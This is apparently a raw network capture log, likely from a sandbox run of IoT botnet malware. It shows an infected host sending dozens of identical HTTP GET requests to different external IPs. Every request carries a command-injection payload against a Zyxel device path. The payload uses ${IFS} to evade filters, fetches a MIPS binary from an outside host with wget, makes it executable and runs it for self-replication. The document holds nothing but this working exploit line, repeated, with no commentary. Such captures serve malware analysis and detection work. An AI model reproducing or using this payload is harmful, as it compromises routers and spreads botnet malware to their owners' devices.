                                                      Feb 2, 2024 06:35:58.753601074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5845192.168.2.144886457.157.170.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753628969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5846192.168.2.144071288.114.25.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753674030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5847192.168.2.143767498.125.206.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753717899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5848192.168.2.145759058.242.211.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753746033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5849192.168.2.1447294166.140.177.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753777027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5850192.168.2.144116868.236.246.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753833055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5851192.168.2.145943841.26.48.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753855944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5852192.168.2.1454672126.100.129.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753907919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5853192.168.2.14416745.194.1.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753962994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5854192.168.2.1441576206.28.237.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753990889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5855192.168.2.1450556129.46.25.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754040956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5856192.168.2.1444894109.21.31.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754076958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5857192.168.2.1448098220.87.112.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754117966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5858192.168.2.1454256167.196.91.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754158020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5859192.168.2.1460170178.85.70.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754182100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5860192.168.2.1448622122.220.12.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754231930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5861192.168.2.1450496203.240.167.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754275084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5862192.168.2.1445302183.74.13.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754295111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5863192.168.2.143898671.180.7.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754334927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5864192.168.2.1450100197.30.224.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754357100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5865192.168.2.1449498169.91.44.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754396915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5866192.168.2.143679671.148.185.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754436970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5867192.168.2.1454286131.14.94.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754460096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5868192.168.2.1456928197.196.109.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754513025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5869192.168.2.1455072124.252.255.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754554033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5870192.168.2.1443420140.142.198.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754579067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5871192.168.2.145561261.102.37.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754630089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5872192.168.2.1439118218.11.103.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754657984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5873192.168.2.1439650124.10.180.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754690886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5874192.168.2.145970631.59.142.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754740000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5875192.168.2.144919854.189.23.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754776001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5876192.168.2.1439792191.136.10.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754796028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5877192.168.2.143858650.39.45.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754841089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5878192.168.2.1436820175.82.168.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754863977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5879192.168.2.144139847.193.196.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754909992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5880192.168.2.144516023.1.93.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.754946947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5881192.168.2.143990875.195.241.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755001068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5882192.168.2.144453639.4.25.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755036116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5883192.168.2.1434842164.183.9.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755054951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5884192.168.2.1433792101.177.232.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755104065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5885192.168.2.144872272.50.86.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755122900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5886192.168.2.1453352138.135.15.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755177975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5887192.168.2.145206669.47.232.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755227089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5888192.168.2.143319232.151.98.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755283117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5889192.168.2.1456814183.253.168.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755306959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5890192.168.2.1448726199.81.31.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755337954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5891192.168.2.144632087.60.156.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755393982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5892192.168.2.1440230121.204.89.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755434990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5893192.168.2.1436904210.93.86.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755469084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5894192.168.2.1446398125.208.152.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755510092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5895192.168.2.1453316153.154.56.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755548000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5896192.168.2.1444478208.241.121.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755568981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5897192.168.2.1455464113.211.153.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755644083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5898192.168.2.1440108133.98.97.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755652905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5899192.168.2.1458074189.51.118.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755702972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5900192.168.2.1456760191.164.117.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755747080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5901192.168.2.1458954137.216.118.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755793095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5902192.168.2.1438328154.20.212.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755836964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5903192.168.2.1450508211.22.118.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755878925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5904192.168.2.1448150168.149.157.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755943060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5905192.168.2.1437464212.36.132.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.755961895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5906192.168.2.143790270.198.30.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.756009102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5907192.168.2.144126692.97.195.79443
                                                      TimestampBytes transferredDirectionData
